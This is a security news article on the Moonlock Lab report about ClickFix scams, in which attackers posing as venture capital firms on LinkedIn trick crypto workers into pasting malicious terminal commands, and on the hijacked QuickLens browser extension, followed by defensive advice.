ClickFix hackers impersonate venture capital firms to attack crypto users; QuickLens maliciously hijacks exposure.

Cybersecurity company Moonlock Lab released a report on Monday revealing the latest tactics used by cryptocurrency hackers centered around the “ClickFix” method: scammers disguise themselves as venture capital firms such as SolidBit and MegaBit to contact crypto industry professionals on LinkedIn, offering collaboration opportunities. They ultimately trick victims into executing malicious commands on their computers, stealing crypto assets.

Analysis of the ClickFix Attack Method: Turning Victims into Attackers

The core innovation of ClickFix lies in completely overturning traditional malware infection pathways. The attack process typically involves the following stages:

Stage 1 (LinkedIn Social Engineering): Hackers contact targets pretending to be legitimate venture capital firms, offering seemingly genuine business collaborations to establish initial trust.

Stage 2 (Fake Video Links): Targets are directed to phishing links disguised as Zoom or Google Meet, leading to a simulated “event page.”

Stage 3 (Clipboard Hijacking): The page displays a fake Cloudflare “I’m not a robot” verification box; clicking it secretly copies malicious commands to the user’s clipboard.

Stage 4 (Self-Execution): Users are prompted to open their terminal and paste the “verification code,” which actually executes the attack commands.

Moonlock Lab’s research team states: “The efficiency of ClickFix lies in transforming the victim into the execution mechanism of the attack. By having victims paste and run commands themselves, attackers bypass years of security measures—without exploiting vulnerabilities or triggering suspicious downloads.”

QuickLens Hijacking Incident Details and Malicious Features List

The QuickLens hijacking case presents another attack vector—supply chain attacks targeting legitimate users:

• February 1: QuickLens extension ownership transferred (ownership change)
• Two weeks later: New owner releases an update containing malicious scripts
• February 23: Security researcher Tuckner publicly discloses the extension was removed from Chrome Web Store

Malicious features include:

• Searching for and stealing crypto wallet data and seed phrases
• Accessing user Gmail inbox contents
• Stealing YouTube channel information
• Intercepting login credentials and payment information entered into web forms

According to eSecurity Planet, this hijacked extension deployed both the ClickFix attack module and other info-stealing tools, indicating the operators possess multi-tool coordination capabilities.

Broader Threat Context of ClickFix

Moonlock Lab notes that ClickFix technology has rapidly gained popularity among threat actors since 2025. Its main advantage is exploiting human behavior rather than software vulnerabilities, fundamentally evading traditional security detection logic.

Microsoft Threat Intelligence warned in August 2025 that they continued to track “daily attacks targeting thousands of global enterprises and endpoints”; in a July 2025 report, cybersecurity firm Unit42 confirmed that ClickFix had impacted multiple industries—including manufacturing, wholesale and retail, state and local governments, and utilities—far beyond just cryptocurrency.

Frequently Asked Questions

Q: Why can ClickFix attacks successfully bypass antivirus and security software?
Traditional antivirus relies on identifying and blocking suspicious programs automatically. ClickFix’s breakthrough is making “people” the executors—victims actively input and run commands—rather than malware automatically implanting itself. This behavior makes behavioral detection tools less effective because the actions appear as normal user operations on the endpoint.

Q: How can I identify social engineering attacks like ClickFix?
Key signs include: receiving offers of business cooperation from unfamiliar LinkedIn accounts; being prompted to enter a “verification code” or “fix steps” after clicking meeting links; instructions to open a terminal and paste codes; fake verification interfaces disguised as Cloudflare or CAPTCHA. The security principle is: legitimate services never require users to run commands in the terminal for authentication.

Q: What should QuickLens users do now?
If you have installed the QuickLens extension, remove it immediately from your browser. Also, change all potentially affected crypto wallets (generate new seed phrases and transfer funds to new wallets), and reset passwords for Gmail and other accounts. Regularly review installed browser extensions and remain highly alert to any recent ownership changes.